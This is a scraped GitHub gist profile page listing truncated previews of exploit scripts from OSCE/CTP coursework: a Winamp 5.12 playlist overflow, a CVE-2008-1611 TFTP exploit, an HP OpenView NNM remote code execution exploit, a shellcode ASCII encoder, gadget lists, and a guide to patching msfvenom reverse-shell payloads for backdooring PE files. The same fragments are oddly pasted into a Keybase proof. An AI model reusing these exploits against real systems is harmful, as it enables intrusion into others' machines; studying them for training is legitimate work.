James Milazzo JamesMilazzo

## winamp-5.12-unc-exploit.pl
#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original Poc by Umesh Wanve (umesh_345@yahoo.com)
# Exploit crafted by Mariusz B. / mgeeky (for occassion of OSCE/CTP, 2017)
# ====================================================================

$start = "[playlist]\r\nFile1=\\\\";

$egg = "T00WT00W";

## cve2008-1611.py
#!/usr/bin/python

import socket
import struct

HOST = '192.168.1.100'
PORT = 69

def send_packet(filename):
    #

## printable.sh
#!/bin/bash
# Consider having following input gathered from Metasploit's msfpescan utility (msfpescan -M -p dump/ ):
#   bash$ cat msfpescan.log
#
#   [./6d210000.rng]
#   0x6d21185f pop edi; pop esi; ret
#   0x6d213ba2 pop esi; pop ebp; ret
#   0x6d213d2b pop esi; pop ebp; ret
#   0x6d213f03 pop edi; pop esi; ret
#   0x6d2140bf pop ebx; pop ebp; ret

## ascii-shellcode-encoder.py
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving

## hp-openview-exploit.py
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'

import struct
import socket

HOST = '192.168.XXX.YYY'
PORT = 7510

## msfvenom-reverse-tcp-WaitForSingleObject.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                JamesMilazzo
                / msfvenom-reverse-tcp-WaitForSingleObject.md
            
            
              Created
              March 25, 2018 01:15
                — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
            
              
                (OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.
              
          
    Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:

  
## gist:513cd552394d46735401
### Keybase proof

I hereby claim:

  * I am JamesMilazzo on github.
  * I am zo (https://keybase.io/zo) on keybase.
  * I have a public key whose fingerprint is 39D5 BF1A A497 63A7 370E  7498 26A7 2F7A 1991 E084

To claim this, I am signing this object:
	#!/usr/bin/perl -w
	# ====================================================================
	# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
	# Original Poc by Umesh Wanve (umesh_345@yahoo.com)
	# Exploit crafted by Mariusz B. / mgeeky (for occassion of OSCE/CTP, 2017)
	# ====================================================================

	$start = "[playlist]\r\nFile1=\\\\";

	$egg = "T00WT00W";
	#!/usr/bin/python

	import socket
	import struct

	HOST = '192.168.1.100'
	PORT = 69

	def send_packet(filename):
	#
	#!/bin/bash
	# Consider having following input gathered from Metasploit's msfpescan utility (msfpescan -M -p dump/ ):
	# bash$ cat msfpescan.log
	#
	# [./6d210000.rng]
	# 0x6d21185f pop edi; pop esi; ret
	# 0x6d213ba2 pop esi; pop ebp; ret
	# 0x6d213d2b pop esi; pop ebp; ret
	# 0x6d213f03 pop edi; pop esi; ret
	# 0x6d2140bf pop ebx; pop ebp; ret
	#!/usr/bin/python
	#
	# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
	# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
	# utility (as described in: Hacking - The Art of Exploitation).
	#
	# Basically one gives to the program's output a binary encoded shellcode,
	# and it yields on the output it's ASCII encoded form.
	#
	# This payload will at the beginning align the stack by firstly moving
	#!/usr/bin/python
	# HP OpenView NNM B.07.50 Remote Code Execution exploit
	# by Mariusz B. / mgeeky, 17'

	import struct
	import socket

	HOST = '192.168.XXX.YYY'
	PORT = 7510
	### Keybase proof

	I hereby claim:

	* I am JamesMilazzo on github.
	* I am zo (https://keybase.io/zo) on keybase.
	* I have a public key whose fingerprint is 39D5 BF1A A497 63A7 370E 7498 26A7 2F7A 1991 E084

	To claim this, I am signing this object: